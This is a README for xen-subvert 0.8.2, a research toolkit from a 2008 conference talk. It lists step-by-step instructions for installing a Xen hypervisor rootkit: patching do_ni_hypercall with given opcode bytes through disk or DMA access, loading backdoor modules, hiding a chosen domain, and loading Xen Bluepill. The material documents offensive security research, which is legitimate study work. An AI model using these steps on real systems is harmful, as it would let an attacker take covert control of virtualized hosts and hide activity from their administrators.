xen-subvert-0.8.2, by rafal.wojtczuk@invisiblethingslab.com and others

See the tools description in the BH08 presentation/whitepaper. The tools in 
"devel" directory (particularly "xenload") are required by others. Set 
XENMODDIR environment variable to this directory and possibly include it in 
the $PATH.

The rootkit installation steps:
1) Using either "direct_hdd" or "tg3dma" tools, overwrite do_ni_hypercall
function with "ff 54 24 04 90 c3" (which is "call 4(%esp); ret"); use
"ff d7" (jmp %rdi) on x86_64
2) Set the correct addresses in devel/xenlib.c; take them from 
/boot/xen-syms-x.y.z or use pattern-matching as described in the
presentation
3) "make" in devel
4) "make" in "seal_backdoor"; xenload seal.o
5) build and load a kernel module in "alloc_scratch", get value from 
/proc/scratch0 (it is scratch0 parameter to hdebug.xko), unload the module
6) set XENDIR env variable to the "xen" directory in xen source code; if it
was not compiled, then do
ln -s asm-x86 xen-x.x.x/xen/include/asm
in xen source tree.
7) "make" in "dr_backdoor"; xenload hdebug.o scratch0=see_above [use_napi=1]
8) optionally, "make" in "xmlist"; 
xenload domlist.o hidden_domain=ID_to_hide
9) for foreign_backdoor instructions see its directory

The code was tested on Fedora Core 6,7,8 on x86_32; the devel tools and 
direct_hdd module was tested on FC8 x86_64 as well.

The xbpldr directory contains code necessary to load Xen Bluepill.
